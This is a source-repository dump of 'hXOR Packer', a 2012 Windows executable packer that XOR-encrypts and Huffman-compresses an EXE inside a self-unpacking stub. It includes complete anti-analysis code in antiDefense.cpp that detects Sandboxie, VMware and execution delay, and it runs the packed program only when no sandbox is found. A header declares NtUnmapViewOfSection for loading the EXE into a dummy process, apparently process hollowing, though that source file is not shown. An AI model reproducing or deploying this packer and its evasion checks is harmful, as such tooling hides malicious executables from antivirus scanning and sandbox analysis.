├── Release ├── packer.exe └── unpackerLoadEXE.exe ├── packer ├── obj │ └── Debug │ │ ├── main.o │ │ └── src │ │ ├── huffman.o │ │ ├── compression.o │ │ ├── encryption.o │ │ └── packingInfo.o ├── bin │ └── Debug │ │ ├── packer.exe │ │ └── unpackerLoadEXE.exe ├── include │ ├── encryption.h │ ├── huffman.h │ └── packingInfo.h ├── packer.layout ├── src │ ├── encryption.cpp │ ├── huffman.cpp │ └── packingInfo.cpp ├── packer.cbp ├── main.cpp └── packer.depend ├── unpacker ├── obj │ └── Debug │ │ ├── main.o │ │ └── src │ │ ├── HuffmanD.o │ │ ├── loadEXE.o │ │ ├── antiDefense.o │ │ └── decryption.o ├── bin │ └── Debug │ │ └── unpackerLoadEXE.exe ├── include │ ├── decryption.h │ ├── antiDefense.h │ ├── HuffmanD.h │ └── loadEXE.h ├── unpackerLoadEXE.layout ├── src │ ├── decryption.cpp │ ├── antiDefense.cpp │ ├── HuffmanD.cpp │ └── loadEXE.cpp ├── main.cpp ├── unpackerLoadEXE.cbp.cbTemp ├── unpackerLoadEXE.cbp └── unpackerLoadEXE.depend ├── README.md └── LICENSE /Release/packer.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/akuafif/hXOR-Packer/HEAD/Release/packer.exe -------------------------------------------------------------------------------- /packer/obj/Debug/main.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/akuafif/hXOR-Packer/HEAD/packer/obj/Debug/main.o -------------------------------------------------------------------------------- /unpacker/obj/Debug/main.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/akuafif/hXOR-Packer/HEAD/unpacker/obj/Debug/main.o -------------------------------------------------------------------------------- /Release/unpackerLoadEXE.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/akuafif/hXOR-Packer/HEAD/Release/unpackerLoadEXE.exe -------------------------------------------------------------------------------- /packer/bin/Debug/packer.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/akuafif/hXOR-Packer/HEAD/packer/bin/Debug/packer.exe -------------------------------------------------------------------------------- /packer/obj/Debug/src/huffman.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/akuafif/hXOR-Packer/HEAD/packer/obj/Debug/src/huffman.o -------------------------------------------------------------------------------- /packer/obj/Debug/src/compression.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/akuafif/hXOR-Packer/HEAD/packer/obj/Debug/src/compression.o -------------------------------------------------------------------------------- /packer/obj/Debug/src/encryption.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/akuafif/hXOR-Packer/HEAD/packer/obj/Debug/src/encryption.o -------------------------------------------------------------------------------- /packer/obj/Debug/src/packingInfo.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/akuafif/hXOR-Packer/HEAD/packer/obj/Debug/src/packingInfo.o -------------------------------------------------------------------------------- /unpacker/obj/Debug/src/HuffmanD.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/akuafif/hXOR-Packer/HEAD/unpacker/obj/Debug/src/HuffmanD.o -------------------------------------------------------------------------------- /unpacker/obj/Debug/src/loadEXE.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/akuafif/hXOR-Packer/HEAD/unpacker/obj/Debug/src/loadEXE.o -------------------------------------------------------------------------------- /packer/bin/Debug/unpackerLoadEXE.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/akuafif/hXOR-Packer/HEAD/packer/bin/Debug/unpackerLoadEXE.exe -------------------------------------------------------------------------------- /unpacker/obj/Debug/src/antiDefense.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/akuafif/hXOR-Packer/HEAD/unpacker/obj/Debug/src/antiDefense.o -------------------------------------------------------------------------------- /unpacker/obj/Debug/src/decryption.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/akuafif/hXOR-Packer/HEAD/unpacker/obj/Debug/src/decryption.o -------------------------------------------------------------------------------- /unpacker/bin/Debug/unpackerLoadEXE.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/akuafif/hXOR-Packer/HEAD/unpacker/bin/Debug/unpackerLoadEXE.exe -------------------------------------------------------------------------------- /packer/include/encryption.h: -------------------------------------------------------------------------------- 1 | #ifndef ENCRYPTION_H 2 | #define ENCRYPTION_H 3 | 4 | 5 | #include 6 | #include 7 | #include 8 | 9 | UCHAR* encryptFile(UCHAR *input, long size); 10 | UCHAR* encryptFile(UCHAR *input, long size, int key); 11 | #endif // ENCRYPTION_H 12 | -------------------------------------------------------------------------------- /unpacker/include/decryption.h: -------------------------------------------------------------------------------- 1 | #ifndef DECRYPTION_H 2 | #define DECRYPTION_H 3 | 4 | #include 5 | #include 6 | #include 7 | 8 | UCHAR* decryptFile(UCHAR *input, long size); 9 | UCHAR* decryptFile(UCHAR *input, long size, int key); 10 | 11 | #endif // DECRYPTION_H 12 | -------------------------------------------------------------------------------- /unpacker/include/antiDefense.h: -------------------------------------------------------------------------------- 1 | #ifndef ANTIDEFENSE_H 2 | #define ANTIDEFENSE_H 3 | 4 | #include //used for printf etc 5 | #include 6 | #include 7 | #include 8 | 9 | using std::string; 10 | 11 | bool runtimeDelay(); 12 | bool InSandboxie(); 13 | bool InVMware(); 14 | bool isProcessRunning(const string exeName); 15 | bool isAll(); 16 | 17 | #endif // ANTIDEFENSE_H 18 | -------------------------------------------------------------------------------- /packer/packer.layout: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /unpacker/unpackerLoadEXE.layout: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | -------------------------------------------------------------------------------- /unpacker/src/decryption.cpp: -------------------------------------------------------------------------------- 1 | #include "decryption.h" 2 | 3 | UCHAR* decryptFile(UCHAR *input, long size){ 4 | UCHAR *inptr, *outptr, *decryptInput; 5 | decryptInput = (UCHAR *) malloc (size*sizeof(UCHAR)); 6 | 7 | inptr = input; 8 | outptr = decryptInput; 9 | char a; 10 | 11 | //generate key 12 | srand(size); 13 | int key = rand() % 69; 14 | printf("key is : %d\n", key); 15 | 16 | //encrypt using XOR key 17 | for(int cur = 0; cur < size; ++cur){ 18 | a = *(inptr); 19 | int b = (int)a; 20 | b ^= key; 21 | a = char(b); 22 | *(outptr) = a; 23 | ++outptr; 24 | ++inptr; 25 | } 26 | 27 | return decryptInput; 28 | } 29 | 30 | UCHAR* decryptFile(UCHAR *input, long size, int key){ 31 | UCHAR *inptr, *outptr, *decryptInput; 32 | decryptInput = (UCHAR *) malloc (size*sizeof(UCHAR)); 33 | 34 | inptr = input; 35 | outptr = decryptInput; 36 | char a; 37 | 38 | //generate key 39 | printf("key is : %d\n", key); 40 | srand(key); 41 | key = rand() % 69; 42 | 43 | //encrypt using XOR key 44 | for(int cur = 0; cur < size; ++cur){ 45 | a = *(inptr); 46 | int b = (int)a; 47 | b ^= key; 48 | a = char(b); 49 | *(outptr) = a; 50 | ++outptr; 51 | ++inptr; 52 | } 53 | 54 | return decryptInput; 55 | } 56 | -------------------------------------------------------------------------------- /unpacker/main.cpp: -------------------------------------------------------------------------------- 1 | #include "loadEXE.h" 2 | 3 | int main(int argc, char *argv[]){ 4 | if(argc > 1 && string(argv[1]) == "-ls"){ 5 | AllocConsole(); 6 | freopen("CONOUT$", "w", stdout); 7 | freopen("CONOUT$", "w", stderr); 8 | freopen("CONIN$", "r", stdin); 9 | } 10 | 11 | if(!isAll()){ 12 | char packArchive[MAX_PATH]; 13 | long startingPosition; 14 | 15 | // get self file name by using GetModuleName 16 | // how GetModuleFileName works? 17 | GetModuleFileName(NULL, // in HMODULE hModule. If NULL, current process path will be used 18 | packArchive, // out LPTSTR lpFilename. Variable to capture 19 | sizeof(packArchive)); //in DWORD nSize. 20 | 21 | // get the starting position of the BIN archive inside you 22 | getInsertPosition(packArchive, &startingPosition); 23 | 24 | printf("hXOR Un-Packer by Afif, 2012" 25 | "\n--------------------------------------------------------------------------\n"); 26 | 27 | int rc = unpackFiles(packArchive, startingPosition, argv[0]); 28 | if (rc != PESuccess) 29 | printf("%s \n", PEerrors_str[rc]); 30 | else 31 | printf("\nDone!\n"); 32 | } 33 | 34 | if(argc > 1 && string(argv[1]) == "-ls") 35 | system("PAUSE"); 36 | 37 | return 0; 38 | } 39 | -------------------------------------------------------------------------------- /unpacker/include/HuffmanD.h: -------------------------------------------------------------------------------- 1 | #ifndef HUFFMAN_H 2 | #define HUFFMAN_H 3 | 4 | #include 5 | #include 6 | 7 | class HuffmanD{ 8 | private: 9 | class node{ 10 | public: 11 | node *left, *right; 12 | int count; // frequency 13 | int code; // the code or path to it. eg, 11010 14 | int codelength; // the number of bits taken. eg, 11010 is 5 bits 15 | UCHAR chr; // the actual character is being compress 16 | node(void) {memset(this, 0, sizeof(node));} // constructor 17 | ~node() { 18 | if (left) {delete left; left = NULL;} 19 | if (right) {delete right; right = NULL;} 20 | } 21 | }; 22 | node *trees[256]; // Array of trees, 23 | node *leaves[256]; // array of leaves, contains ASCII char that being compressed 24 | // ref. count, later code and codelength too. It is a reference to original trees above 25 | node *trees_backup[256]; 26 | int STEPS[256]; // as the tree is constructed, this stores exact steps (movings) of the last tree 27 | int stepscount; 28 | node nodes[256]; 29 | 30 | void MakeHuffmanTree(); 31 | 32 | int treescount; 33 | UCHAR *allocatedoutput; 34 | void setCodeAndLength(node *, int, int); // set code and codelength of the leaves 35 | void moveTreesToRight(node **toTree); 36 | 37 | public: 38 | HuffmanD(); 39 | int Decompress(UCHAR *input, int inputlength); 40 | 41 | UCHAR *getOutput(); // get the actual decompreess data 42 | int getLastError(); 43 | }; 44 | 45 | #endif 46 | -------------------------------------------------------------------------------- /packer/src/encryption.cpp: -------------------------------------------------------------------------------- 1 | #include "encryption.h" 2 | 3 | UCHAR* encryptFile(UCHAR *input, long size){ 4 | UCHAR *inptr, *outptr, *encryptInput; 5 | inptr = input; 6 | 7 | encryptInput = new UCHAR[size]; 8 | outptr = encryptInput; 9 | char a; 10 | 11 | //generate key 12 | srand(size); 13 | int key = rand() % 69; 14 | printf("key is : %d\n", key); 15 | 16 | //encrypt using XOR key 17 | for(long cur = 0; cur < size; ++cur){ 18 | a = *(inptr); 19 | int b = (int)a; 20 | b ^= key; 21 | a = char(b); 22 | *(outptr) = a; 23 | ++outptr; 24 | ++inptr; 25 | } 26 | 27 | //return encrypted content 28 | return encryptInput; 29 | } 30 | 31 | UCHAR* encryptFile(UCHAR *input, long size, int key){ 32 | UCHAR *inptr, *outptr, *encryptInput; 33 | inptr = input; 34 | 35 | encryptInput = new UCHAR[size]; 36 | outptr = encryptInput; 37 | char a; 38 | 39 | //generate key 40 | printf("key is : %d\n", key); 41 | 42 | //make sure the xor result will not more that the acsii table value. 43 | srand(key); 44 | key = rand() % 69; 45 | 46 | //encrypt using XOR key 47 | for(long cur = 0; cur < size; ++cur){ 48 | a = *(inptr); 49 | int b = (int)a; 50 | b ^= key; 51 | a = char(b); 52 | *(outptr) = a; 53 | ++outptr; 54 | ++inptr; 55 | } 56 | 57 | //return encrypted content 58 | return encryptInput; 59 | } 60 | 61 | -------------------------------------------------------------------------------- /packer/packer.cbp: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 49 | 50 | -------------------------------------------------------------------------------- /unpacker/unpackerLoadEXE.cbp.cbTemp: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 48 | 49 | -------------------------------------------------------------------------------- /packer/include/huffman.h: -------------------------------------------------------------------------------- 1 | #ifndef HUFFMAN_H 2 | #define HUFFMAN_H 3 | 4 | #include 5 | #include 6 | 7 | class huffman{ 8 | private: 9 | class node{ 10 | public: 11 | node *left, *right; 12 | int count; // frequency 13 | int code; // the code or path to it. eg, 11010 14 | int codelength; // the number of bits taken. eg, 11010 is 5 bits 15 | UCHAR chr; // the actual character is being compress 16 | node(void) {memset(this, 0, sizeof(node));} // constructor 17 | ~node() { 18 | if (left) {delete left; left = NULL;} 19 | if (right) {delete right; right = NULL;} 20 | } 21 | }; 22 | node *trees[256]; // Array of trees, 23 | node *leaves[256]; // array of leaves, contains ASCII char that being compressed 24 | // ref. count, later code and codelength too. It is a reference to original trees above 25 | node *trees_backup[256]; 26 | int STEPS[256]; // as the tree is constructed, this stores exact steps (movings) of the last tree 27 | int stepscount; 28 | node nodes[256]; 29 | 30 | void MakeHuffmanTree(); 31 | 32 | int treescount; 33 | UCHAR *allocatedoutput; 34 | void setCodeAndLength(node *, int, int); // set code and codelength of the leaves 35 | static int compareFrequency(const void *A, const void *B); // sorting, highest frequency first 36 | void moveTreesToRight(node **toTree); 37 | 38 | void tryToRelocate(); 39 | void moveToTop(); 40 | public: 41 | huffman(); 42 | int Compress(UCHAR *input, int inputlength); 43 | 44 | UCHAR *getOutput(); // get the actual compreess data 45 | int getLastError(); 46 | }; 47 | 48 | #endif 49 | -------------------------------------------------------------------------------- /unpacker/unpackerLoadEXE.cbp: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 50 | 51 | -------------------------------------------------------------------------------- /unpacker/src/antiDefense.cpp: -------------------------------------------------------------------------------- 1 | #include "antiDefense.h" 2 | 3 | bool detected = 0; 4 | 5 | bool runtimeDelay(){ 6 | DWORD count, count2; 7 | 8 | printf("Scanning for execution delay...\n"); 9 | 10 | count = GetTickCount(); 11 | Sleep(500); 12 | count2 = GetTickCount(); 13 | printf("count: %lu\ncount2: %lu\noffset: %lu\n\n", count, count2, count2-count); 14 | 15 | if ((count2 - count) > 550){ 16 | detected = 1; 17 | return 1; 18 | } 19 | 20 | return 0; 21 | } 22 | 23 | bool InSandboxie(){ 24 | printf("Scanning for Sandboxie...\n"); 25 | if(GetModuleHandle("SbieDll.dll")){ 26 | detected = 1; 27 | return 1; 28 | } 29 | 30 | return 0; 31 | } 32 | 33 | bool InVMware(){ 34 | printf("Scanning for VMware...\n"); 35 | if(isProcessRunning("VMwareUser.exe")) 36 | { 37 | detected = 1; 38 | return 1; 39 | } 40 | return 0; 41 | } 42 | 43 | bool isProcessRunning(const string exeName){ 44 | PROCESSENTRY32 pce = {sizeof(PROCESSENTRY32)}; 45 | HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0); 46 | 47 | if(Process32First(hSnapshot, &pce)) 48 | { 49 | 50 | do 51 | { 52 | 53 | if(!strcmp((const char*)pce.szExeFile, (const char*)exeName.c_str())) 54 | { 55 | return 1; 56 | } 57 | 58 | }while( Process32Next(hSnapshot, &pce) ); 59 | 60 | } 61 | 62 | return 0; 63 | } 64 | 65 | bool isAll(){ 66 | if(runtimeDelay()) 67 | printf("Runtime scanning was detected\n\n"); 68 | else if(InSandboxie()) 69 | printf("Sandboxie detected!!!\n\n"); 70 | else if(InVMware()) 71 | printf("VMware detected!!!\n\n"); 72 | 73 | if(detected==0) 74 | printf("Nothing was detected!\n\n"); 75 | 76 | if(detected == 0) return 0; 77 | else return 1; 78 | } 79 | -------------------------------------------------------------------------------- /unpacker/include/loadEXE.h: -------------------------------------------------------------------------------- 1 | #ifndef LOADEXE_H 2 | #define LOADEXE_H 3 | 4 | /******************************************************************** 5 | #INCLUDE 6 | *********************************************************************/ 7 | #include "HuffmanD.h" 8 | #include "decryption.h" 9 | #include "antiDefense.h" 10 | #include 11 | #include 12 | 13 | /******************************************************************** 14 | GLOBAL VARIABLES 15 | *********************************************************************/ 16 | enum packingErrors{ 17 | PESuccess = 0, //no error at all 18 | PEerrorNoFiles, //no files to extrace. invalid archive 19 | PEerrorPath, //error in path 20 | PEerrorNoSignatureFound, //invalid archive, unable to unpack non-archive file 21 | PEerrorExtractError, //cound not extract the archive file 22 | PEerrorCouldNotOpenArchive, //fail to open archive for extraction 23 | PEerrorDummyProcessFail, //cannot create dummy process 24 | PEerrorInputNotEXE, //No valid MZ or NT header found 25 | PEerrorWriteProcessFail 26 | }; extern const char *PEerrors_str[]; 27 | 28 | /******************************************************************** 29 | TYPEDEF DEFINITION 30 | *********************************************************************/ 31 | typedef long int (__stdcall* NtUnmapViewOfSectionF)(HANDLE,PVOID); 32 | 33 | typedef struct { 34 | char filename[MAX_PATH]; 35 | long filesize; 36 | int key; 37 | int parameter; 38 | } packdata_t; 39 | 40 | /******************************************************************** 41 | FUNCTION DECLARATION 42 | *********************************************************************/ 43 | int unpackFiles(char *binFile, long startPosition, char *pPath); 44 | int getInsertPosition(char *filename, long *pos); 45 | int LoadEXE(LPVOID lpImage); 46 | 47 | #endif // LOADEXE_H 48 | -------------------------------------------------------------------------------- /packer/main.cpp: -------------------------------------------------------------------------------- 1 | #include "packingInfo.h" 2 | 3 | /******************************************************************** 4 | this prograom can only accepts one valid EXE files. 5 | It will then pack them into one exe file, for example, calling it output.exe. 6 | the output.exe will unpack the exe files and run them at the same time. 7 | 8 | this program will only run with arguments in the terminal. 9 | it will never ask for user input during runtime 10 | it will only display if it is success or fail. 11 | ********************************************************************/ 12 | 13 | int main(int argc, char *argv[]){ 14 | //display how to use this 15 | if (argc < 3){ //not enough arguments to proceed 16 | printf("hXOR Packer by Afif, 2012" 17 | "\n--------------------------------------------------------------------------\n" 18 | "How to use?\n\n" 19 | "For Packing:\n" 20 | " -> EXE File (Absolute Path)\n" 21 | " -> Destination Output (Absolute Path)\n" 22 | "

-> Parameters (Optional)\n" 23 | " -> Xor Encryption Key in numbers (Optional)\n" 24 | "\nAvaliable Parameters (Optional):\n" 25 | "-c\t\tCompression\n-e\t\tEncryption\n-ce\t\tCompression & Encryption\n\nExamples:\n" 26 | ">>>packer.exe

\n" 27 | ">>>packer.exe C:\\in.exe C:\\folder\\out.exe\n" 28 | ">>>packer.exe C:\\in.exe C:\\folder\\out.exe -ce 56213\n\n" 29 | ); 30 | } 31 | 32 | if(argc >= 3){ //packing 33 | printf("hXOR Packer by Afif, 2012" 34 | "\n--------------------------------------------------------------------------\n"); 35 | int resultError = packFileIntoArchive(argc, argv); 36 | 37 | if(resultError != PESuccess) 38 | printf("Error: %s \n", PEerrors_str[resultError]); 39 | } 40 | 41 | system("PAUSE"); 42 | return 0; 43 | } 44 | -------------------------------------------------------------------------------- /packer/include/packingInfo.h: -------------------------------------------------------------------------------- 1 | #ifndef PACKINGINFO_H 2 | #define PACKINGINFO_H 3 | 4 | /******************************************************************** 5 | #INCLUDE 6 | *********************************************************************/ 7 | #include //mainly used for MAX_PATH, HANDLE and more 8 | #include //used for printf etc 9 | #include //encryption header 10 | #include //compression header 11 | #include 12 | 13 | using std::string; 14 | 15 | /******************************************************************** 16 | TYPEDEF DEFINITION 17 | *********************************************************************/ 18 | typedef struct { 19 | // char oriPath[MAX_PATH]; 20 | char filename[MAX_PATH]; 21 | long filesize; 22 | int key; 23 | int parameter; 24 | } packdata_t; 25 | 26 | /******************************************************************** 27 | GLOBAL VARIABLES 28 | *********************************************************************/ 29 | enum packingErrors{ 30 | PESuccess = 0, //no error at all 31 | PEerrorNoFiles, //no files to extrace. invalid archive 32 | PEerrorPath, //error in path 33 | PEerrorCannotCreateArchive, //unable to create archive 34 | PEerrorCouldNotOpenArchive, 35 | PEerrorInvalidParameter, 36 | PEerrorInputNotEXE 37 | }; 38 | extern const char *PEerrors_str[]; 39 | 40 | enum parameters{ 41 | PREmpty = 0, //no valid parameter at all 42 | PRCompression = 1, //compression only 43 | PREncrpytion = 2, //encrytion only 44 | PRBoth 45 | }; 46 | extern const char *Parameter_str[]; 47 | extern const char unpackerStub[]; 48 | 49 | /******************************************************************** 50 | FUNCTION DECLARATION 51 | *********************************************************************/ 52 | int packFileIntoArchive(int, char *[]); 53 | int unpackFiles(char *, char *, long startPosition = 0); 54 | int getInsertPosition(char *, long *); 55 | int setInsertPosition(char *, long); 56 | int validExeFile(const char *); 57 | 58 | #endif // PACKINGINFO_H 59 | -------------------------------------------------------------------------------- /unpacker/unpackerLoadEXE.depend: -------------------------------------------------------------------------------- 1 | # depslib dependency file v1.0 2 | 1336820786 source:c:\users\linuxlovers\desktop\programs\unpackerloadexe\main.cpp 3 | 4 | 5 | 6 | 1336886207 source:c:\users\sony\desktop\testingkkk\unpackerloadexe\main.cpp 7 | 8 | 9 | 10 | 1337069853 source:c:\users\sony\desktop\packer\part 3\unpackerloadexe\main.cpp 11 | "HuffmanD.h" 12 | 13 | 1337067786 source:c:\users\sony\desktop\packer\part 3\unpackerloadexe\src\huffmand.cpp 14 | "HuffmanD.h" 15 | 16 | 1337240811 c:\users\sony\desktop\packer\part 3\unpackerloadexe\include\huffmand.h 17 | 18 | 19 | 20 | 1337240811 source:c:\users\sony\desktop\packer\part 4 - encryption\unpackerloadexe\src\huffmand.cpp 21 | "HuffmanD.h" 22 | 23 | 1337240811 c:\users\sony\desktop\packer\part 4 - encryption\unpackerloadexe\include\huffmand.h 24 | 25 | 26 | 27 | 1339041702 source:c:\users\sony\desktop\packer\part 4 - encryption\unpackerloadexe\main.cpp 28 | "loadEXE.h" 29 | 30 | 1339042588 c:\users\sony\desktop\packer\part 4 - encryption\unpackerloadexe\include\loadexe.h 31 | "HuffmanD.h" 32 | "decryption.h" 33 | 34 | 35 | 36 | 1339042884 source:c:\users\sony\desktop\packer\part 4 - encryption\unpackerloadexe\src\decryption.cpp 37 | "decryption.h" 38 | 39 | 1339042140 c:\users\sony\desktop\packer\part 4 - encryption\unpackerloadexe\include\decryption.h 40 | 41 | 42 | 43 | 44 | 1339042807 source:c:\users\sony\desktop\packer\part 4 - encryption\unpackerloadexe\src\loadexe.cpp 45 | "loadEXE.h" 46 | 47 | 1337240811 source:c:\users\sony\desktop\packer\part 5 - arguments\unpackerloadexe\src\huffmand.cpp 48 | "HuffmanD.h" 49 | 50 | 1337240811 c:\users\sony\desktop\packer\part 5 - arguments\unpackerloadexe\include\huffmand.h 51 | 52 | 53 | 54 | 1340875195 source:c:\users\sony\desktop\packer\part 5 - arguments\unpackerloadexe\src\decryption.cpp 55 | "decryption.h" 56 | 57 | 1340875195 c:\users\sony\desktop\packer\part 5 - arguments\unpackerloadexe\include\decryption.h 58 | 59 | 60 | 61 | 62 | 1341461482 source:c:\users\sony\desktop\packer\part 5 - arguments\unpackerloadexe\main.cpp 63 | "loadEXE.h" 64 | 65 | 1340940337 c:\users\sony\desktop\packer\part 5 - arguments\unpackerloadexe\include\loadexe.h 66 | "HuffmanD.h" 67 | "decryption.h" 68 | "antiDefense.h" 69 | 70 | 71 | 72 | 1341461180 source:c:\users\sony\desktop\packer\part 5 - arguments\unpackerloadexe\src\loadexe.cpp 73 | "loadEXE.h" 74 | 75 | 1340941451 c:\users\sony\desktop\packer\part 5 - arguments\unpackerloadexe\include\antidefense.h 76 | 77 | 78 | 79 | 80 | 81 | 1340946818 source:c:\users\sony\desktop\packer\part 5 - arguments\unpackerloadexe\src\antidefense.cpp 82 | "antiDefense.h" 83 | 84 | 1337240811 source:h:\libraries\my documents\dropbox\ngee ann poly\semester 5\packer\packer\part 5 - arguments\unpackerloadexe\src\huffmand.cpp 85 | "HuffmanD.h" 86 | 87 | 1337240811 h:\libraries\my documents\dropbox\ngee ann poly\semester 5\packer\packer\part 5 - arguments\unpackerloadexe\include\huffmand.h 88 | 89 | 90 | 91 | 1340946818 source:h:\libraries\my documents\dropbox\ngee ann poly\semester 5\packer\packer\part 5 - arguments\unpackerloadexe\src\antidefense.cpp 92 | "antiDefense.h" 93 | 94 | 1340941451 h:\libraries\my documents\dropbox\ngee ann poly\semester 5\packer\packer\part 5 - arguments\unpackerloadexe\include\antidefense.h 95 | 96 | 97 | 98 | 99 | 100 | 1340875195 source:h:\libraries\my documents\dropbox\ngee ann poly\semester 5\packer\packer\part 5 - arguments\unpackerloadexe\src\decryption.cpp 101 | "decryption.h" 102 | 103 | 1340875195 h:\libraries\my documents\dropbox\ngee ann poly\semester 5\packer\packer\part 5 - arguments\unpackerloadexe\include\decryption.h 104 | 105 | 106 | 107 | 108 | 1341461534 source:h:\libraries\my documents\dropbox\ngee ann poly\semester 5\packer\packer\part 5 - arguments\unpackerloadexe\src\loadexe.cpp 109 | "loadEXE.h" 110 | 111 | 1340940337 h:\libraries\my documents\dropbox\ngee ann poly\semester 5\packer\packer\part 5 - arguments\unpackerloadexe\include\loadexe.h 112 | "HuffmanD.h" 113 | "decryption.h" 114 | "antiDefense.h" 115 | 116 | 117 | 118 | 1341461482 source:h:\libraries\my documents\dropbox\ngee ann poly\semester 5\packer\packer\part 5 - arguments\unpackerloadexe\main.cpp 119 | "loadEXE.h" 120 | 121 | -------------------------------------------------------------------------------- /packer/packer.depend: -------------------------------------------------------------------------------- 1 | # depslib dependency file v1.0 2 | 1335521390 source:c:\users\linuxlovers\desktop\programs\packer\src\packinginfo.cpp 3 | "packingInfo.h" 4 | 5 | 1335521390 c:\users\linuxlovers\desktop\programs\packer\include\packinginfo.h 6 | 7 | 8 | 9 | 10 | 1335520434 source:c:\users\linuxlovers\desktop\programs\packer\main.cpp 11 | "packingInfo.h" 12 | 13 | 1335924599 source:h:\libraries\my documents\dropbox\ngee ann poly\semester 5\packer\programs\packer\src\packinginfo.cpp 14 | "packingInfo.h" 15 | 16 | 1335924627 h:\libraries\my documents\dropbox\ngee ann poly\semester 5\packer\programs\packer\include\packinginfo.h 17 | 18 | 19 | 20 | 21 | 1335924616 source:h:\libraries\my documents\dropbox\ngee ann poly\semester 5\packer\programs\packer\main.cpp 22 | "packingInfo.h" 23 | 24 | 1336885494 source:c:\users\sony\desktop\testingkkk\packer\main.cpp 25 | "packingInfo.h" 26 | 27 | 1336838551 c:\users\sony\desktop\testingkkk\packer\include\packinginfo.h 28 | 29 | 30 | 31 | 1336837268 source:c:\users\sony\desktop\testingkkk\packer\src\packinginfo.cpp 32 | "packingInfo.h" 33 | 34 | 1337240079 source:c:\users\sony\desktop\packer\part 3\packer\main.cpp 35 | "packingInfo.h" 36 | 37 | 1337067275 c:\users\sony\desktop\packer\part 3\packer\include\packinginfo.h 38 | 39 | 40 | 41 | 42 | 1337240534 c:\users\sony\desktop\packer\part 3\packer\include\huffman.h 43 | 44 | 45 | 46 | 1337240336 source:c:\users\sony\desktop\packer\part 3\packer\src\huffman.cpp 47 | "huffman.h" 48 | 49 | 1337240336 source:c:\users\sony\desktop\packer\part 3\packer\src\packinginfo.cpp 50 | "packingInfo.h" 51 | 52 | 1337240336 source:c:\users\sony\desktop\packer\part 4 - encryption\packer\src\huffman.cpp 53 | "huffman.h" 54 | 55 | 1337240534 c:\users\sony\desktop\packer\part 4 - encryption\packer\include\huffman.h 56 | 57 | 58 | 59 | 1337240079 source:c:\users\sony\desktop\packer\part 4 - encryption\packer\main.cpp 60 | "packingInfo.h" 61 | 62 | 1339042568 c:\users\sony\desktop\packer\part 4 - encryption\packer\include\packinginfo.h 63 | 64 | 65 | 66 | 67 | 68 | 1339041242 c:\users\sony\desktop\packer\part 4 - encryption\packer\include\compression.h 69 | 70 | 71 | 72 | 73 | 1339041250 source:c:\users\sony\desktop\packer\part 4 - encryption\packer\src\compression.cpp 74 | "compression.h" 75 | 76 | 1339042568 source:c:\users\sony\desktop\packer\part 4 - encryption\packer\src\packinginfo.cpp 77 | "packingInfo.h" 78 | 79 | 1339041893 c:\users\sony\desktop\packer\part 4 - encryption\packer\include\encryption.h 80 | 81 | 82 | 83 | 84 | 1339041893 source:c:\users\sony\desktop\packer\part 4 - encryption\packer\src\encryption.cpp 85 | "encryption.h" 86 | 87 | 1340875091 source:c:\users\sony\desktop\packer\part 5 - arguments\packer\src\encryption.cpp 88 | "encryption.h" 89 | 90 | 1340874965 c:\users\sony\desktop\packer\part 5 - arguments\packer\include\encryption.h 91 | 92 | 93 | 94 | 95 | 1337240336 source:c:\users\sony\desktop\packer\part 5 - arguments\packer\src\huffman.cpp 96 | "huffman.h" 97 | 98 | 1337240534 c:\users\sony\desktop\packer\part 5 - arguments\packer\include\huffman.h 99 | 100 | 101 | 102 | 1340938442 source:c:\users\sony\desktop\packer\part 5 - arguments\packer\src\packinginfo.cpp 103 | "packingInfo.h" 104 | 105 | 1340874965 c:\users\sony\desktop\packer\part 5 - arguments\packer\include\packinginfo.h 106 | 107 | 108 | 109 | 110 | 111 | 112 | 1340936471 source:c:\users\sony\desktop\packer\part 5 - arguments\packer\main.cpp 113 | "packingInfo.h" 114 | 115 | 1340875091 source:h:\libraries\my documents\dropbox\ngee ann poly\semester 5\packer\packer\part 5 - arguments\packer\src\encryption.cpp 116 | "encryption.h" 117 | 118 | 1340874965 h:\libraries\my documents\dropbox\ngee ann poly\semester 5\packer\packer\part 5 - arguments\packer\include\encryption.h 119 | 120 | 121 | 122 | 123 | 1337240336 source:h:\libraries\my documents\dropbox\ngee ann poly\semester 5\packer\packer\part 5 - arguments\packer\src\huffman.cpp 124 | "huffman.h" 125 | 126 | 1337240534 h:\libraries\my documents\dropbox\ngee ann poly\semester 5\packer\packer\part 5 - arguments\packer\include\huffman.h 127 | 128 | 129 | 130 | 1340938442 source:h:\libraries\my documents\dropbox\ngee ann poly\semester 5\packer\packer\part 5 - arguments\packer\src\packinginfo.cpp 131 | "packingInfo.h" 132 | 133 | 1340874965 h:\libraries\my documents\dropbox\ngee ann poly\semester 5\packer\packer\part 5 - arguments\packer\include\packinginfo.h 134 | 135 | 136 | 137 | 138 | 139 | 140 | 1341803664 source:h:\libraries\my documents\dropbox\ngee ann poly\semester 5\packer\packer\part 5 - arguments\packer\main.cpp 141 | "packingInfo.h" 142 | 143 | 